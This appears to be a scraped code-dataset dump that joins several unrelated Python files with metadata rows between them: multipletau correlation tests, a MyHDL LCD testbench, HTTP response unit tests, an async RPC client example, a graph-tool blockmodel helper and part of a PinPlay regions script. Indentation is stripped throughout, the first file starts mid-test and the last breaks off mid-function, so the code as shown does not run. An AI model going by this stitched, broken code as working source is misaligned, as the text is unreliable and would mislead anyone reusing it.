# two consecutive elements are the same, so the multiple-tau method
# corresponds to the numpy correlation for the first loop.
a[::2] = a[1::2]
for m in [2, 4, 6, 8, 10, 12, 14, 16]:
restau = multipletau.correlate(a=a,
v=a.imag+1j*a.real,
m=m,
copy=True,
normalize=False,
dtype=np.complex_)
reslin = multipletau.correlate_numpy(a=a,
v=a.imag+1j*a.real,
copy=True,
normalize=False,
dtype=np.complex_)
idtau = np.where(restau[:, 0] == m+2)[0][0]
tau3 = restau[idtau, 1] # m+1 initial bins
idref = np.where(reslin[:, 0] == m+2)[0][0]
tau3ref = reslin[idref, 1]
assert np.allclose(tau3, tau3ref)
def test_corresponds_ac_nonormalize():
myframe = sys._getframe()
myname = myframe.f_code.co_name
print("running ", myname)
a = np.concatenate(get_sample_arrays_cplx()).real
m = 16
restau = multipletau.autocorrelate(a=1*a,
m=m,
copy=True,
normalize=False,
dtype=np.float_)
reslin = multipletau.correlate_numpy(a=1*a,
v=1*a,
copy=True,
normalize=False,
dtype=np.float_)
idx = np.array(restau[:, 0].real, dtype=int)[:m+1]
assert np.allclose(reslin[idx, 1], restau[:m+1, 1])
def test_corresponds_cc():
myframe = sys._getframe()
myname = myframe.f_code.co_name
print("running ", myname)
a = np.concatenate(get_sample_arrays_cplx())
m = 16
restau = multipletau.correlate(a=a,
v=a.imag+1j*a.real,
m=m,
copy=True,
normalize=True,
dtype=np.complex_)
reslin = multipletau.correlate_numpy(a=a,
v=a.imag+1j*a.real,
copy=True,
normalize=True,
dtype=np.complex_)
idx = np.array(restau[:, 0].real, dtype=int)[:m+1]
assert np.allclose(reslin[idx, 1], restau[:m+1, 1])
def test_corresponds_cc_nonormalize():
myframe = sys._getframe()
myname = myframe.f_code.co_name
print("running ", myname)
a = np.concatenate(get_sample_arrays_cplx())
m = 16
restau = multipletau.correlate(a=a,
v=a.imag+1j*a.real,
m=m,
copy=True,
normalize=False,
dtype=np.complex_)
reslin = multipletau.correlate_numpy(a=a,
v=a.imag+1j*a.real,
copy=True,
normalize=False,
dtype=np.complex_)
idx = np.array(restau[:, 0].real, dtype=int)[:m+1]
assert np.allclose(reslin[idx, 1], restau[:m+1, 1])
if __name__ == "__main__":
# Run all tests
loc = locals()
for key in list(loc.keys()):
if key.startswith("test_") and hasattr(loc[key], "__call__"):
loc[key]()
| 33.125 | 71 | 0.456089 | 649 | 5,830 | 3.949153 | 0.224961 | 0.008584 | 0.066329 | 0.044479 | 0.615685 | 0.606321 | 0.600078 | 0.595006 | 0.589934 | 0.576668 | 0 | 0.030368 | 0.440823 | 5,830 | 175 | 72 | 33.314286 | 0.755828 | 0.158148 | 0 | 0.766355 | 0 | 0 | 0.012661 | 0 | 0 | 0 | 0 | 0 | 0.046729 | 1 | 0.046729 | false | 0 | 0.037383 | 0 | 0.084112 | 0.046729 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8015962c36f7108badf443ec7534f5753cd6e921 | 2,101 | py | Python | test/test_cores/test_video/test_lt24lcdsys.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | 1 | 2022-03-16T23:56:09.000Z | 2022-03-16T23:56:09.000Z | test/test_cores/test_video/test_lt24lcdsys.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | null | null | null | test/test_cores/test_video/test_lt24lcdsys.py | meetps/rhea | f8a9a08fb5e14c5c4488ef68a2dff4d18222c2c0 | [
"MIT"
] | null | null | null |
from __future__ import print_function
from argparse import Namespace
# a video display model to check timing
import pytest
from myhdl import Signal, intbv, instance, delay, StopSimulation, now
from rhea.system import Clock, Reset, Global
from rhea.cores.video.lcd import LT24Interface
from rhea.models.video import LT24LCDDisplay
from rhea.utils.test import run_testbench, tb_args
from mm_lt24lcdsys import mm_lt24lcdsys
from mm_lt24lcdsys import convert
@pytest.mark.skipif(True, reason="pytest issue/error 10x runtime")
def test_lt24lcd():
args = Namespace()
tb_lt24lcd(args=args)
def tb_lt24lcd(args=None):
clock = Clock(0, frequency=50e6)
reset = Reset(0, active=0, async=True)
glbl = Global(clock, reset)
lcd_on = Signal(bool(0))
lcd_resetn = Signal(bool(0))
lcd_csn = Signal(bool(0))
lcd_rs = Signal(bool(0))
lcd_wrn = Signal(bool(0))
lcd_rdn = Signal(bool(0))
lcd_data = Signal(intbv(0)[16:])
lcd = LT24Interface()
resolution = lcd.resolution
color_depth = lcd.color_depth
# assign the ports to the interface
lcd.assign(lcd_on, lcd_resetn, lcd_csn, lcd_rs, lcd_wrn,
lcd_rdn, lcd_data)
mvd = LT24LCDDisplay()
def _bench_lt24lcdsys():
tbdut = mm_lt24lcdsys(clock, reset, lcd_on, lcd_resetn,
lcd_csn, lcd_rs, lcd_wrn, lcd_rdn,
lcd_data)
tbvd = mvd.process(glbl, lcd) # LCD display model
tbclk = clock.gen()
@instance
def tbstim():
yield reset.pulse(33)
yield clock.posedge
timeout = 33000
while mvd.update_cnt < 3 and timeout > 0:
yield delay(1000)
timeout -= 1
yield delay(100)
print("{:<10d}: simulation real time {}".format(now(), mvd.get_time()))
raise StopSimulation
return tbdut, tbvd, tbclk, tbstim
run_testbench(_bench_lt24lcdsys)
def test_conversion():
convert()
if __name__ == '__main__':
tb_lt24lcd(tb_args())
test_conversion()
| 26.2625 | 83 | 0.640647 | 272 | 2,101 | 4.742647 | 0.397059 | 0.046512 | 0.051163 | 0.065116 | 0.068217 | 0.068217 | 0.068217 | 0.068217 | 0.068217 | 0.068217 | 0 | 0.041451 | 0.265112 | 2,101 | 79 | 84 | 26.594937 | 0.794041 | 0.042361 | 0 | 0 | 0 | 0 | 0.034895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.181818 | null | null | 0.036364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
801d907dbd6651a1c3f1baa79169bbd085c486ee | 2,682 | py | Python | request_signer/tests/test_response.py | imtapps/django-request-signer | b059d021b6e068245030ab682c2cff4318c83ca6 | [
"BSD-2-Clause"
] | 1 | 2017-01-23T19:21:23.000Z | 2017-01-23T19:21:23.000Z | request_signer/tests/test_response.py | imtapps/django-request-signer | b059d021b6e068245030ab682c2cff4318c83ca6 | [
"BSD-2-Clause"
] | 14 | 2016-01-21T17:18:21.000Z | 2022-02-09T19:21:59.000Z | request_signer/tests/test_response.py | imtapps/django-request-signer | b059d021b6e068245030ab682c2cff4318c83ca6 | [
"BSD-2-Clause"
] | 3 | 2016-01-25T19:32:21.000Z | 2016-08-23T15:37:38.000Z | import six
if six.PY3:
from unittest import mock
from io import StringIO
else:
import mock
from cStringIO import StringIO
from http.client import responses
import json
from django import test
from request_signer.client.generic import Response
class ResponseTests(test.TestCase):
def setUp(self):
self.raw_response = mock.Mock()
self.response = Response(self.raw_response)
def test_response_requires_url_to_init(self):
self.assertEqual(self.response.raw_response, self.raw_response)
@mock.patch.object(Response, '_evaluate_response_code_for_success')
def test_response_is_successful_returns_value_from_evaluate(self, evaluate_response):
self.assertEqual(self.response.is_successful, evaluate_response.return_value)
@mock.patch.object(Response, 'status_code', mock.Mock())
@mock.patch.object(Response, '_evaluate_response_code_for_success')
def test_response_is_successful_calls_evaluate_with_status_code(self, evaluate_response):
getattr(self.response, 'is_successful')
evaluate_response.assert_called_once_with(self.response.status_code)
def test_bad_http_status_return_false_from_evaluate_response_code_for_success(self):
include_status = lambda status: status < 200 or status > 299
self.evaluate_response_code_for_success(False, include_status)
def test_good_http_status_return_true_from_evaluate_response_code_for_success(self):
include_status = lambda status: 199 < status < 300
self.evaluate_response_code_for_success(True, include_status)
def evaluate_response_code_for_success(self, expected, include_status):
statuses = (status for status in responses.keys() if include_status(status))
for response_code in statuses:
value = self.response._evaluate_response_code_for_success(response_code)
message = "it seems '%s' returned '%s' for some odd reason" % (response_code, value)
self.assertEqual(expected, value, message)
def test_status_code_returns_status_code_from_raw_response(self):
self.raw_response.code = 201
self.assertEqual(201, self.response.status_code)
def test_returns_dict_of_json_data_from_response(self):
self.raw_response.read.return_value = '{"first":"item"}'
self.assertEqual(dict(first='item'), self.response.json)
def test_can_read_response_multiple_times(self):
data = '{"data": "this is the response"}'
expected = json.loads(data)
self.response.raw_response = StringIO(data)
self.assertEqual(expected, self.response.json)
self.assertEqual(expected, self.response.json)
| 42.571429 | 96 | 0.751305 | 350 | 2,682 | 5.414286 | 0.248571 | 0.101319 | 0.084433 | 0.097098 | 0.367282 | 0.338786 | 0.150923 | 0.150923 | 0.150923 | 0.150923 | 0 | 0.008505 | 0.16704 | 2,682 | 62 | 97 | 43.258065 | 0.839749 | 0 | 0 | 0.081633 | 0 | 0 | 0.071961 | 0.0261 | 0 | 0 | 0 | 0 | 0.163265 | 1 | 0.204082 | false | 0 | 0.183673 | 0 | 0.408163 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
802cdedc55b19a30eabaf8043c64d8287cf38eb3 | 1,064 | py | Python | example/exc/client.py | so1n/rap | e4e3f4fab9df6190793ec97008bccb669546f207 | [
"Apache-2.0"
] | 3 | 2020-12-24T14:42:49.000Z | 2022-03-23T07:28:58.000Z | example/exc/client.py | so1n/rap | e4e3f4fab9df6190793ec97008bccb669546f207 | [
"Apache-2.0"
] | 1 | 2021-01-20T10:24:49.000Z | 2021-01-30T07:52:47.000Z | example/exc/client.py | so1n/rap | e4e3f4fab9df6190793ec97008bccb669546f207 | [
"Apache-2.0"
] | null | null | null | import asyncio
import time
from rap.client import Client
from rap.common.exceptions import FuncNotFoundError
client: Client = Client("example", [{"ip": "localhost", "port": "9000"}])
# in register, must use async def...
@client.register()
async def raise_msg_exc(a: int, b: int) -> int:
pass
# in register, must use async def...
@client.register()
async def raise_server_not_found_func_exc(a: int) -> None:
pass
async def main() -> None:
s_t = time.time()
await client.start()
try:
await raise_msg_exc(1, 2)
except Exception as e:
assert isinstance(e, ZeroDivisionError)
try:
await raise_server_not_found_func_exc(1)
except Exception as e:
assert isinstance(e, FuncNotFoundError)
print(time.time() - s_t)
await client.stop()
if __name__ == "__main__":
import logging
logging.basicConfig(
format="[%(asctime)s %(levelname)s] %(message)s", datefmt="%y-%m-%d %H:%M:%S", level=logging.INFO
)
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| 23.130435 | 105 | 0.662594 | 147 | 1,064 | 4.605442 | 0.47619 | 0.059084 | 0.041359 | 0.050222 | 0.32644 | 0.32644 | 0.257016 | 0.153619 | 0.153619 | 0.153619 | 0 | 0.008274 | 0.204887 | 1,064 | 45 | 106 | 23.644444 | 0.791962 | 0.06485 | 0 | 0.258065 | 0 | 0 | 0.090726 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 1 | 0 | false | 0.064516 | 0.16129 | 0 | 0.16129 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
8032858404b723ecb11e6d7ac5febb5da3de0fd6 | 1,452 | py | Python | src/block/mcmc.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | [
"BSD-3-Clause"
] | null | null | null | src/block/mcmc.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | [
"BSD-3-Clause"
] | null | null | null | src/block/mcmc.py | zeou1/maggot_models | 4e1b518c2981ab1ca9607099c3813e8429d94ca4 | [
"BSD-3-Clause"
] | null | null | null | # TODO write utilities for running MCMC stuff
import networkx as nx
from graph_tool.inference import minimize_blockmodel_dl
from graph_tool import load_graph
import numpy as np
import pandas as pd
import os
from src.graph import MetaGraph
def run_minimize_blockmodel(mg, temp_loc=None, weight_model=None):
meta = mg.meta.copy()
meta = pd.DataFrame(mg.meta["neuron_name"])
mg = MetaGraph(mg.adj, meta)
if temp_loc is None:
temp_loc = f"maggot_models/data/interim/temp-{np.random.randint(1e8)}.graphml"
# save to temp
nx.write_graphml(mg.g, temp_loc)
# load into graph-tool from temp
g = load_graph(temp_loc, fmt="graphml")
os.remove(temp_loc)
total_degrees = g.get_total_degrees(g.get_vertices())
remove_verts = np.where(total_degrees == 0)[0]
g.remove_vertex(remove_verts)
if weight_model is not None:
recs = [g.ep.weight]
rec_types = [weight_model]
else:
recs = []
rec_types = []
state_args = dict(recs=recs, rec_types=rec_types)
min_state = minimize_blockmodel_dl(g, verbose=False, state_args=state_args)
blocks = list(min_state.get_blocks())
verts = g.get_vertices()
block_map = {}
for v, b in zip(verts, blocks):
cell_id = int(g.vertex_properties["_graphml_vertex_id"][v])
block_map[cell_id] = int(b)
block_series = pd.Series(block_map)
block_series.name = "block_label"
return block_series
| 29.632653 | 86 | 0.694215 | 222 | 1,452 | 4.297297 | 0.414414 | 0.044025 | 0.027254 | 0.033543 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003454 | 0.202479 | 1,452 | 48 | 87 | 30.25 | 0.82038 | 0.059917 | 0 | 0 | 0 | 0 | 0.081558 | 0.047024 | 0 | 0 | 0 | 0.020833 | 0 | 1 | 0.027778 | false | 0 | 0.194444 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
803911ad68063ce4c7a23b2522b750059f50235b | 21,773 | py | Python | pin_kit/extras/pinplay/PinPoints/scripts/regions.py | sawansib/Sniper | 45ec1eeb09b81a7250bc1a1aaa452f16b2b7f497 | [
"MIT"
] | 1 | 2021-04-22T05:27:08.000Z | 2021-04-22T05:27:08.000Z | pin_kit/extras/pinplay/PinPoints/scripts/regions.py | sawansib/SNIPER | 45ec1eeb09b81a7250bc1a1aaa452f16b2b7f497 | [
"MIT"
] | null | null | null | pin_kit/extras/pinplay/PinPoints/scripts/regions.py | sawansib/SNIPER | 45ec1eeb09b81a7250bc1a1aaa452f16b2b7f497 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# BEGIN_LEGAL
# BSD License
#
# Copyright (c)2014 Intel Corporation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer. Redistributions
# in binary form must reproduce the above copyright notice, this list of
# conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution. Neither the name of
# the Intel Corporation nor the names of its contributors may be used to
# endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE INTEL OR
# ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# END_LEGAL
#
#
# @ORIGINAL_AUTHORS: T. Mack Stallcup, Cristiano Pereira, Harish Patil, Chuck Yount
#
#
# Read in a file of frequency vectors (BBV or LDV) and execute one of several
# actions on it. Default is to generate a regions CSV file from a BBV file.
# Other actions include:
# normalizing and projecting FV file to a lower dimension
#
# $Id: regions.py,v 1.11.1.9 2014/06/09 23:30:44 tmstall Exp tmstall $
import datetime
import glob
import optparse
import os
import random
import re
import sys
import cmd_options
import msg
import util
def GetOptions():
"""
Get users command line options/args and check to make sure they are correct.
@return List of options and 3 file pointers: fp_bbv, fp_simp, fp_weight
"""
version = '$Revision: 1.11.1.9 $'; version = version.replace('$Revision: ', '')
ver = version.replace(' $', '')
us = '%prog [options] FVfile'
desc = 'Implements several different actions to process FV (Frequency Vector) files ' \
'such as BBV and LDV files. ' \
'All actions requires a FV file as an argument, while some require additional ' \
'options. ' \
' '\
'--------------------------------------------'\
' '\
'Default action is to generate a regions CSV file (--csv_region), which requires additional '\
'options --region_file and --weight_file. '
parser = optparse.OptionParser(usage=us, version=ver, description=desc)
# Command line options to control script behavior.
#
# import pdb; pdb.set_trace()
cmd_options.csv_region(parser, '')
cmd_options.focus_thread(parser, '')
# cmd_options.bbv_file(parser) # Currently, don't use this option as FV file is required
cmd_options.project_bbv(parser, '')
cmd_options.region_file(parser, '')
cmd_options.weight_file(parser, '')
# Parse command line options and get any arguments.
#
(options, args) = parser.parse_args()
# If user does not chose an action to perform, then run the
# default: region CSV generation
#
if not options.project_bbv:
options.csv_region = True
# Must at least define a FV file.
#
if hasattr(options, 'bbv') and options.bbv_file != '':
bbv_file = options.bbv_file
else:
if len(args) < 1:
msg.PrintAndExit('Must have at least a FVfile as an argument.\n'
'Use -h to get help')
bbv_file = args[0]
# Check to make sure valid FV file exists.
#
# import pdb; pdb.set_trace()
err_msg = lambda string: msg.PrintAndExit('This is not a valid file, ' + string + \
'\nUse -h for help.')
bbv_str = "basic block vector file: "
if hasattr(options, 'bbv_file') and options.bbv_file == '':
bbv_file = args[0]
if not os.path.isfile(bbv_file):
err_msg(bbv_str + bbv_file)
# BBV file must have at least one line which starts with 'T:'.
#
fp_bbv = util.OpenCompressFile(bbv_file)
if fp_bbv == None:
err_msg(bbv_str + bbv_file)
line = fp_bbv.readline()
while not line.startswith('T:') and line != '':
line = fp_bbv.readline()
if not line.startswith('T:'):
err_msg(sim_str + simp_file)
fp_bbv.seek(0,0)
# If required, look for additional files.
#
fp_simp = fp_weight = None
if options.csv_region:
sim_str = "simpoints file: "
weight_str = "weights file: "
simp_file = options.region_file
weight_file = options.weight_file
if not os.path.isfile(simp_file):
err_msg(sim_str + simp_file)
if not os.path.isfile(weight_file):
err_msg(weight_str + weight_file)
# Simpoints file must start with an integer.
#
fp_simp = util.OpenCompressFile(simp_file)
if fp_simp == None:
err_msg(sim_str + simp_file)
line = fp_simp.readline()
l_list = line.split()
if not l_list[0].isdigit():
err_msg(sim_str + simp_file)
# Weight file must either have a floating point number < 1.0 as the first
# value in the file or the first line must be two integers. (The first
# integer are assumed to be '1', i.e. a slice with weight 1. Should never get
# a weight > 1.)
#
fp_weight = util.OpenCompressFile(weight_file)
if fp_weight == None:
err_msg(weight_str + weight_file)
line = fp_weight.readline()
l_list = line.split()
if '.' not in l_list[0] and not re.search('\d\s\d', line):
err_msg(weight_str + weight_file)
fp_simp.seek(0,0)
fp_weight.seek(0,0)
return (options, fp_bbv, fp_simp, fp_weight)
def GetSlice(fp):
"""
Get the frequency vector for one slice (i.e. line in the FV file).
All the frequency vector data for a slice is contained in one line. It
starts with the char 'T'. After the 'T', there should be a sequence of
the following tokens:
':' integer ':' integer
where the first integer is the dimension index and the second integer is
the count for that dimension. Ignore any whitespace.
@return list of the frequency vectors for a slice, element = (dimension, count)
"""
fv = []
line = fp.readline()
while not line.startswith('T:') and line != '':
# print 'Skipping line: ' + line
# Don't want to skip the part of BBV files at the end which give
# information on the basic blocks in the file. If 'Block id:' is
# found, then back up the file pointer to before this string.
#
if line.startswith('Block id:'):
fp.seek(0-len(line), os.SEEK_CUR)
return []
line = fp.readline()
if line == '': return []
blocks = re.findall(':\s*(\d+)\s*:\s*(\d+)\s*', line)
# print 'Slice:'
for block in blocks:
# print block
bb = int(block[0])
count = int(block[1])
fv.append((bb, count))
# import pdb; pdb.set_trace()
return fv
def GetBlockIDs(fp):
"""
Get the information about each basic block which is stored at the end
of BBV frequency files.
Extract the values for fields 'block id' and 'static instructions' from
each block. Here's an example block id entry:
Block id: 2233 0x69297ff1:0x69297ff5 static instructions: 2 block count: 1 block size: 5
@return list of the basic block info, elements are (block_id, icount of block)
"""
block_id = []
line = fp.readline()
while not line.startswith('Block id:') and line != '':
line = fp.readline()
if line == '': return []
while line.startswith('Block id:'):
bb = int(line.split('Block id:')[1].split()[0])
bb -= 1 # Change BBs to use 0 based numbering instead of 1 based
icount = int(line.split('static instructions:')[1].split()[0])
block_id.append((bb, icount))
line = fp.readline()
# import pdb; pdb.set_trace()
return block_id
############################################################################
#
# Functions for generating regions CSV files
#
############################################################################
def GetWeights(fp):
"""
Get the regions and weights from a weights file.
@return lists of regions and weights
"""
weight_list = []
weight_regions = []
for line in fp.readlines():
field = re.match('(0\.\d+).*(\d+)', line)
# Look for the special case where the first field is a single digit
# without the decimal char '.'. This should be the weight of '1'.
#
if field == None:
field = re.match('(\d)\s(\d)', line)
if field:
weight = float(field.group(1))
region = int(field.group(2))
weight_list.insert(region, weight)
weight_regions.append(region)
return weight_list, weight_regions
def GetSimpoints(fp):
"""
Get the regions and slices from the Simpoint file.
@return list of regions and slices from a Simpoint file
"""
slice_list = []
simp_regions = []
for line in fp.readlines():
field = re.match('(\d+).*(\d+)', line)
if field:
slice_num = int(field.group(1))
region = int(field.group(2))
slice_list.insert(region, slice_num)
simp_regions.append(region)
return slice_list, simp_regions
def GetRegionBBV(fp):
"""
Read all the frequency vector slices and the basic block id info from a
basic block vector file. Put the data into a set of lists which are used
in generating CSV regions.
@return cumulative_icount, all_bb, bb_freq, bb_num_instr, region_bbv
"""
# Dictionary which contains the number of instructions in each BB.
# Key is basic block number.
#
bb_num_instr = {}
# Dictionary which contains the number of times a BB was executed
# Key is basic block number.
#
bb_freq = {}
# Currently not set by the function. May use in the future for calculating
# coverage.
#
# List of BB vectors for each representative region. Each element is
# a dictionary keyed on BB number with the icount of the block in that
# specific slice.
#
region_bbv = []
# Set of all BB found in the BBV file. Each element
# is a tuple with the BB number and # of instr in BB.
#
all_bb = []
# List of the cumulative sum of instructions in the slices. There is one
# entry for each slice in the BBV file which contains the total icount up
# to the end of the slice.
#
cumulative_icount = []
# Cumulative sum of instructions so far
#
run_sum = 0
# Get each slice & generate some data on it.
#
while True:
fv = GetSlice(fp)
if fv == []:
break
# print fv
# Get icount for BB in slice and record the cumulative icount.
#
sum = 0
for bb in fv:
count = bb[1]
sum += count
# Add the number instructions for the current BB to total icount for
# this specific BB (bb_num_instr).
#
bb_num_instr[bb] = bb_num_instr.get(bb, 0) + count
# Increment the number of times this BB number has been encountered
#
bb_freq[bb] = bb_freq.get(bb, 0) + 1
if sum != 0:
run_sum += sum
cumulative_icount += [run_sum]
# import pdb; pdb.set_trace()
# Read the basic block information at the end of the file if it exists.
#
# import pdb; pdb.set_trace()
all_bb = GetBlockIDs(fp)
# if all_bb != []:
# print 'Block ids'
# print all_bb
# The list 'all_bb' should contain one entry for each basic block in the
# application (and the corresponding icount). Check to see if there are
# any missing BB entries in the list 'all_bb'. If there are, then add them
# to the list with an icount of 0. Sort the final list so the icount can
# be accessed by BB number in constant time.
#
# import pdb; pdb.set_trace()
if all_bb != []:
all_bb.sort(key=lambda bb: bb[0])
length = len(all_bb)
max_bb_num = all_bb[length-1][0] # Last list entry has the total number of BB
if max_bb_num+1 > length:
# Missing at least one BB entry in the list.
#
array_index = 0 # Used to access the next entry in the list
count = 0 # Used to loop thru the list
while count <= length:
if all_bb[array_index][0] != count:
# Missing this BB entry in the list. Add the missing BB tuple
# with icount = 0
#
all_bb.append((array_index, 0))
count += 1 # Skip the 'missing' entry
array_index += 1
count += 1
all_bb.sort(key=lambda bb: bb[0]) # Sort once missing entries are added
# import pdb; pdb.set_trace()
return cumulative_icount, all_bb, bb_freq, bb_num_instr, region_bbv
def CheckRegions(simp_regions, weight_regions):
"""
Check to make sure the simpoint and weight files contain the same regions.
@return no return value
"""
if len(simp_regions) != len(weight_regions) or \
set(simp_regions) != set(weight_regions):
msg.PrintMsg('ERROR: Regions in these two files are not identical')
msg.PrintMsg(' Simpoint regions: ' + str(simp_regions))
msg.PrintMsg(' Weight regions: ' + str(weight_regions))
cleanup()
sys.exit(-1)
def GenRegionCSV(options, fp_bbv, fp_simp, fp_weight):
"""
Read in three files (BBV, weights, simpoints) and print to stdout
a regions CSV file which defines the representative regions.
@return no return value
"""
# Read data from weights, simpoints and BBV files.
# Error check the regions.
#
weight_list, weight_regions = GetWeights(fp_weight)
slice_list, simp_regions = GetSimpoints(fp_simp)
cumulative_icount, all_bb, bb_freq, bb_num_instr, region_bbv = GetRegionBBV(fp_bbv)
CheckRegions(simp_regions, weight_regions)
total_num_slices = len(cumulative_icount)
total_instr = cumulative_icount[len(cumulative_icount)-1]
# import locale
# locale.setlocale(locale.LC_ALL, "")
# total_instr = locale.format('%d', total_instr, True)
# total_bb_icount = locale.format('%d', total_bb_icount, True)
# Print header information
#
msg.PrintMsgNoCR('# Regions based on: ')
for string in sys.argv:
msg.PrintMsgNoCR(string + ' '),
msg.PrintMsg('')
msg.PrintMsg('# comment,thread-id,region-id,simulation-region-start-icount,simulation-region-end-icount,region-weight')
# msg.PrintMsg('')
# Print region information
#
# import pdb; pdb.set_trace()
if options.focus_thread != -1:
tid = int(options.focus_thread)
else:
tid = 0
total_icount = 0
region = 1 # First region is always numbered 1
for slice_num, weight in zip(slice_list, weight_list):
if slice_num == 0:
# If this is the first slice, set the initial icount to 0
#
start_icount = 0
else:
# Use cumulative icount of previous slice to get the initial
# icount of this slice.
#
start_icount = cumulative_icount[slice_num-1]+1
end_icount = cumulative_icount[slice_num]
length = end_icount - start_icount + 1
total_icount += length
msg.PrintMsg('# Region = %d Slice = %d Icount = %d Length = %d Weight = %.5f' % \
(region, slice_num, start_icount, length, weight))
msg.PrintMsg('Cluster %d from slice %d,%d,%d,%d,%d,%.5f\n' % \
(region-1, slice_num, tid, region, start_icount, end_icount, weight))
region +=1
# Currently does nothing as 'region_bbv' is always null (at least for now.)
#
# Get a set which contains BBs of all representative regions
#
all_region_bb = set()
for bbv in region_bbv:
region_bb = 0
for bb in bbv:
all_region_bb.add(bb)
bb, icount = all_bb[bb-1]
region_bb += int(icount)
print 'Trace coverage: %.4f' % (float(region_bb)/total_instr)
# Get total number of instructions for BBs in representative regions
#
region_bb_icount = 0
for num in all_region_bb:
bb, icount = all_bb[num-1]
region_bb_icount += int(icount)
# Print summary statistics
#
# import pdb; pdb.set_trace()
msg.PrintMsg('# Total instructions in %d regions = %d' % (len(simp_regions), total_icount))
msg.PrintMsg('# Total instructions in workload = %d' % cumulative_icount[total_num_slices-1])
msg.PrintMsg('# Total slices in workload = %d' % total_num_slices)
# msg.PrintMsg('# Overall dynamic coverage of workload by these regions = %.4f' \
# % (float(region_bb_icount)/total_bb_icount))
############################################################################
#
# Functions for normalization and projection
#
############################################################################
def GetDimRandomVector(proj_matrix, proj_dim, dim):
"""
Get the random vector for dimension 'dim'. If it's already in 'proj_matrix',
then just return it. Otherwise, generate a new random vector of length
'proj_dim' with values between -1 and 1.
@return list of length 'dim' which contains vector of random values
"""
# import pdb; pdb.set_trace()
if proj_matrix.has_key(dim):
# print 'Using random vector: %4d' % dim
vector = proj_matrix.get(dim)
else:
# print 'Generating random vector: %4d' % dim
random.seed() # Use default source for seed
vector = []
index = 0
while index < proj_dim:
vector.append(random.uniform(-1, 1))
index += 1
proj_matrix[dim] = vector
return vector
def ProjectFVFile(fp, proj_dim=15):
"""
Read all the slices in a frequency vector file, normalize them and use a
random projection matrix to project them onto a result matrix with dimensions:
num_slices x proj_dim.
@return list of lists which contains the result matrix
"""
# Dictionary which contains the random projection matrix. The keys are the
# FV dimension (NOT the slice number) and the value is a list of random
# values with length 'proj_dim'.
#
proj_matrix = {}
# List of lists which contains the result matrix. One element for each slice.
#
result_matrix = []
while True:
fv = GetSlice(fp)
if fv == []:
break
# Get the sum of all counts for this slice for use in normalizing the
# dimension counts.
#
# import pdb; pdb.set_trace()
# print fv
vector_sum = 0
for block in fv:
vector_sum += block[1]
# Initilize this slice/vector of the result matrix to zero
#
result_vector = [0] * proj_dim
# For each element in the slice, project using the "dimension of the
# element", not the element index itself!
#
sum = 0
# import pdb; pdb.set_trace()
for block in fv:
dim = block[0]
# print 'Dim: %4d' % dim
count = float(block[1]) / vector_sum # Normalize freq count
# Get the random vector for the dimension 'dim' and project the values for
# 'dim' into the result
#
proj_vector = GetDimRandomVector(proj_matrix, proj_dim, dim)
index = 0
while index < proj_dim:
result_vector[index] += count * proj_vector[index]
index += 1
